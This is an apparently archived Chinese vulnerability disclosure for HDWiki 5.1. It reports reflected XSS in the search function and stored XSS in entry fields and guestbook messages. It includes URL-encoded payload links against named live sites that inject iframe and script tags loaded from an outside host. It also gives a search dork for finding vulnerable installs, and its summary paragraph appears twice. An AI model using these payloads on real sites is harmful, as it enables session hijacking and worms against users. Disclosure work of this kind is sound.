VULHUB ™

### 简要描述： 这个有一定的用户数量，可csrf、劫持首页、蠕虫等，cog也在其列。 ### 详细说明： 由于偶尔原因发现cog存在wiki导致的xss可劫持首页，发现它的wiki是hdwiki的5.1版本。于是测试了其他的hdwiki发现存在同样的xss问题。 问题总结如下。 1. hdwiki的搜索有非持久xss，如： http://www.laohuaxia.com/index.php?search-fulltext-title-%5C%22%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1 [<img src="https://images.seebug.org/upload/201208/04134051baa7115aba81ca041924317df46824b6.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201208/04134051baa7115aba81ca041924317df46824b6.jpg) http://wiki.chowngroup.com/index.php?search-fulltext-title-%5C%22%3E%3Cscript%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%2Fq%26%2346%3Bjs%3E--all-0-within-time-desc-1 http://wiki.chowngroup.com/index.php?search-fulltext-title-TAG%3A%5C%22%3E%5C%27%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1 [<img src="https://images.seebug.org/upload/201208/041342013931f05f39948419eb98c21f2605b24f.jpg" alt="" width="600"...

### 简要描述： 这个有一定的用户数量，可csrf、劫持首页、蠕虫等，cog也在其列。 ### 详细说明： 由于偶尔原因发现cog存在wiki导致的xss可劫持首页，发现它的wiki是hdwiki的5.1版本。于是测试了其他的hdwiki发现存在同样的xss问题。 问题总结如下。 1. hdwiki的搜索有非持久xss，如： http://www.laohuaxia.com/index.php?search-fulltext-title-%5C%22%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1 [<img src="https://images.seebug.org/upload/201208/04134051baa7115aba81ca041924317df46824b6.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201208/04134051baa7115aba81ca041924317df46824b6.jpg) http://wiki.chowngroup.com/index.php?search-fulltext-title-%5C%22%3E%3Cscript%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%2Fq%26%2346%3Bjs%3E--all-0-within-time-desc-1 http://wiki.chowngroup.com/index.php?search-fulltext-title-TAG%3A%5C%22%3E%5C%27%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1 [<img src="https://images.seebug.org/upload/201208/041342013931f05f39948419eb98c21f2605b24f.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201208/041342013931f05f39948419eb98c21f2605b24f.jpg) 2. hdwiki编辑词条的存储型xss， http://www.laohuaxia.com/index.php?doc-view-1572 http://tmxk.org/thread-625-1-1.html 词条标题，词条标签，词条内容均存在服务端未过滤的问题。 [<img src="https://images.seebug.org/upload/201208/04134239484d70eb2afdac34157a509f96a68397.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201208/04134239484d70eb2afdac34157a509f96a68397.jpg) [<img src="https://images.seebug.org/upload/201208/04134258f5f3417e1ec31c6f5ac4c8f76c5a72f1.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201208/04134258f5f3417e1ec31c6f5ac4c8f76c5a72f1.jpg) 3. hdwiki留言的存储型xss 关键字：http://www.google.com.tw/search?q=intitle:powered+by+HDWiki ### 漏洞证明：